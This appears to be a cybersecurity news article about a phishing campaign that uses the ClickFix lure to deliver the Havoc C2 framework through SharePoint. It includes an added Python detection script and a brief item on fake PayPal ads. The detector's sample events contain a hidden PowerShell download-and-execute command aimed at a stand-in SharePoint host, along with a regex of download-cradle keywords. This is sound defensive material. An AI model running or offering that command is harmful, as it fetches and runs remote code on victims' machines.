Hackers deploy PowerShell-based Havoc C2 via SharePoint sites using Clickfix Trick

March 3, 2025Ravi LakshmananCybercrime/Malware

Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc.

“Threat actors hide each malware stage behind SharePoint sites and use a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted and well-known services.”

The starting point of the attack is a phishing email containing an HTML attachment ("documents.html") that displays a fake error message when opened. The page uses the ClickFix technique to trick the user into copying a malicious command and running it in a terminal or PowerShell window, which then drops the next stage.

This command is designed to download and run a PowerShell script hosted on an adversary-controlled SharePoint server. The newly downloaded PowerShell script checks whether it is running inside a sandbox environment and, if the Python interpreter ("Pythonw.exe") is not already present on the system, downloads it.

The next step is to fetch and run a Python script from the same SharePoint location. This script acts as a shellcode loader for KaynLdr, a reflective loader written in C and assembly that is capable of launching an embedded DLL: in this case, the Havoc Demon agent.

"Threat actors use Havoc in conjunction with the Microsoft Graph API to hide C2 communications within famous services," Fortinet said. The framework supports gathering information, performing file operations, executing commands and payloads, token manipulation, and Kerberos attacks.
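The chain described above (a user-pasted PowerShell one-liner spawned from the desktop, a SharePoint-hosted stage, a Python interpreter launched by that shell, and C2 traffic blending into the Microsoft Graph API) leaves process-tree and network artifacts that can be matched on an endpoint. The following Python is an added detection example written for this article; it is not code from the original page, from Fortinet, or from the Havoc project. It assumes Sysmon-style process-creation and network-connection records reduced to the fields the rules need, assumes that an interactive ClickFix paste shows up as a shell whose parent is explorer.exe or WindowsTerminal.exe, and assumes the Demon beacons from the Python process that loaded the shellcode (which is how the loader stage above would behave). All sample events are constructed for illustration.

```python
"""Added example: flag the ClickFix -> PowerShell -> pythonw.exe -> Graph API chain in endpoint telemetry."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """Process-creation record (Sysmon event ID 1 style), reduced to the fields the rules use."""
    pid: int
    image: str
    command_line: str
    parent_image: str


@dataclass
class NetworkEvent:
    """Outbound connection record (Sysmon event ID 3 style)."""
    pid: int
    image: str
    dest_host: str


Finding = Tuple[str, str, int]  # (severity, rule name, pid)

# Download-and-execute cradles that ClickFix lures typically ask the victim to paste.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)
# Any *.sharepoint.com URL: the campaign stages every component on SharePoint sites.
SHAREPOINT_URL = re.compile(r"https?://[\w.-]+\.sharepoint\.com/", re.IGNORECASE)

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PYTHON = {"pythonw.exe", "python.exe"}
# Assumption: a human pasting into Run, a Start-menu shell, or Windows Terminal yields one of these parents.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
GRAPH_HOST = "graph.microsoft.com"


def image_name(path: str) -> str:
    """Normalise a Windows image path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process(ev: ProcessEvent) -> List[Finding]:
    findings: List[Finding] = []
    image, parent = image_name(ev.image), image_name(ev.parent_image)
    # Rule 1: interactive shell running a download cradle; SharePoint staging raises severity.
    if image in SHELLS and parent in INTERACTIVE_PARENTS and DOWNLOAD_CRADLE.search(ev.command_line):
        severity = "high" if SHAREPOINT_URL.search(ev.command_line) else "medium"
        findings.append((severity, "clickfix_download_cradle", ev.pid))
    # Rule 2: a Python interpreter spawned directly by a shell (the loader stage).
    if image in PYTHON and parent in SHELLS:
        findings.append(("high", "python_spawned_by_shell", ev.pid))
    return findings


def check_network(ev: NetworkEvent) -> List[Finding]:
    # Rule 3: Python talking to the Graph API. Assumption: the Demon beacons from the loader process.
    if image_name(ev.image) in PYTHON and ev.dest_host.lower() == GRAPH_HOST:
        return [("medium", "python_beacon_to_graph_api", ev.pid)]
    return []


def scan(procs: List[ProcessEvent], nets: List[NetworkEvent]) -> List[Finding]:
    """Run all rules and escalate when one Python pid matches both the spawn and the beacon rule."""
    findings: List[Finding] = []
    for p in procs:
        findings.extend(check_process(p))
    for n in nets:
        findings.extend(check_network(n))
    spawned = {pid for _, rule, pid in findings if rule == "python_spawned_by_shell"}
    beaconing = {pid for _, rule, pid in findings if rule == "python_beacon_to_graph_api"}
    for pid in sorted(spawned & beaconing):
        findings.append(("critical", "havoc_chain_correlated", pid))
    return findings


# Constructed sample telemetry (not real captures); tenant name and paths are invented.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(1001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString("
                 "'https://example-tenant.sharepoint.com/sites/docs/stage1.ps1')\"",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(1002, r"C:\Users\alice\AppData\Local\Temp\pythonw.exe", "pythonw.exe loader.py",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(1003, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -NoProfile -c Get-ChildItem", r"C:\Windows\explorer.exe"),  # benign admin use
    ProcessEvent(1004, r"C:\Python312\pythonw.exe", "pythonw.exe app.py", r"C:\Windows\explorer.exe"),  # benign
]
SAMPLE_NETWORK_EVENTS = [
    NetworkEvent(1002, r"C:\Users\alice\AppData\Local\Temp\pythonw.exe", "graph.microsoft.com"),
    NetworkEvent(2000, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "graph.microsoft.com"),  # benign
]

if __name__ == "__main__":
    for severity, rule, pid in scan(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS):
        print(f"[{severity:8}] pid={pid} {rule}")
```

Rule 3 is deliberately only medium on its own, because legitimate Python tooling (Graph SDKs, automation scripts) also talks to graph.microsoft.com; it becomes actionable when correlated with a shell-spawned interpreter, which is why `scan` escalates the intersection rather than any single hit. The ClickFix paste also typically leaves the command in the Run-dialog MRU under HKCU, which is a useful secondary artifact for forensics but is not covered by these process-based rules.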

The development comes as Malwarebytes revealed that threat actors continue to exploit known loopholes in Google Ads policies to target PayPal customers with fake ads served through advertiser accounts that may have been compromised.

The ads attempt to trick victims who are searching for help with account issues or payment concerns into calling fraudulent phone numbers, where they end up handing over personal and financial information.

"A weakness within Google's policy for landing pages (also known as the final URL) allows anyone to impersonate a popular website as long as the landing page and display URL (the web page shown in the ad) share the same domain," says Jérôme Segura, senior director of research at Malwarebytes.

“Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to all kinds of online support and customer service.”
